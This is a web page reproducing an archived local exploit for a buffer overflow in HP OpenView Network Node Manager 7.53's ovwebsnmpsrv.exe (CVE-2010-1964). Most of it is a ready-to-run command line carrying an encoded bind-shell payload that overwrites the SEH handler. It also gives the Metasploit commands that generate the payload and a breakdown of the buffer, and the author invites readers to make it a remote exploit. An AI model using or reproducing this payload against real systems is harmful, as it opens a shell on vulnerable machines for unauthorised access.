Skip to content
cyberexploits
localwindowstext

HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)

HP OpenView Network Node Manager (OV NNM) 7.53 - ovwebsnmpsrv.exe Buffer Overflow (SEH)

Published on 2010-07-07

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/local/14256.txt7eac4c3a
raw
# Exploit Title: HP NNM 7.53 ovwebsnmpsrv.exe Buffer Overflow (SEH)

# Date: 07/06/2010

# Author: bitform

# Software Link: hp.com

# Version: 7.53

# Tested on: Windows XP SP2

# CVE: CVE-2010-1964



# Exploit:



C:\Program Files\HP OpenView\www\bin\ovwebsnmpsrv.exe -dump AAAAAAAAAAAAUXf-9Tf-9Tf-9TU\AAAAAAAAAAAAAAAAAAAAAPYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPNiJEP1KbQtLKPRFPLKF2DLNkF2EDNkD2ExFoMgPJDfDqIoEaIPNLElPaQlFbDlGPJaHODMFaIWKRL0QBF7LKBrFpLKQRElFaJpNkQPD8OuIPCDCzEQHPF0LKQXGhNkBxEpEQHSKSElQYLKDtLKFaKfP1KOP1KpLlIQJoDMGqO7DxM0BUJTFcCMIhGKQmQ4CEKRBxLKBxQ4FaN3E6NkDLPKLKBxELEQJsLKC4NkC1HPMYG4GTQ4QKQKCQPYQJCaKOIpBxQOCjLKDRHkMVCmE8GCFRGpC0E8BWCCP2CoPTPhPLQgFFDGIoJuOHNpEQGpGpQ9HDPTBpBHFIMPPkGpIoKePPPPPPBpG0F0G0F0QxJJDOKoM0KOHULIO7DqIKQCE8C2GpFqQLK9HfPjDPCfCgPhIRIKEgE7KOIEBsBwBHH7KYDxKOIoJuQCCcF7PhQdJLEkKQKON5QGOyIWE8QeBNPMQqKON5BHQsBME4C0NiJCBwBwQGP1L6PjGbPYCfKRImBFO7G4FDGLC1FaNmPDGTFpKvGpG4QDPPCfQFF6CvBvBnBvF6QCQFBHQiJlEoNfKOJuK9IpBnF6CvIoP0BHDHOwGmCPKOHUMkJPH5MrF6BHMvJ5MmOmKOJuElDFCLFjOpKKM0BUEUOKG7GcQbBOCZC0CcKON5DJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMPCCCCCCCCCCCCCCCCCCCCCCCCCCCC



# Notes: 



This is the result of my research on CVE-2010-1964. Finding this vulnerability locally was trivial but getting

a remote exploit via jovgraph.exe never quite worked out for me. I'm hoping someone will be able to make this

a practical remote exploit. :D



Overflowing many of the other command line options will overwrite SEH as well (e.g. -demo)



Explanation of buffer:



"UXf-9Tf-9Tf-9TU"

Carve out EAX as the base register for the alphanumeric shellcode



"PYIIIIIIIIIIIIIIII7QZ"...

Alphanumeric bind shell

# ./msfpayload windows/shell_bind_tcp LPORT=4444 RHOST=127.0.0.1 R | ./msfencode BufferRegister=EAX -e x86/alpha_mixed -t raw



   \/ Overwrite SEH  

  [  ]

"YY5AZCCX,Y,XP\SX-1UUU-1PPP-N_ZZPSX-zzzd-{zzd-{zzMP"

      [                                           ]

	                     /\ Carve out non-conditional jmp to carve EAX code
View on GitHub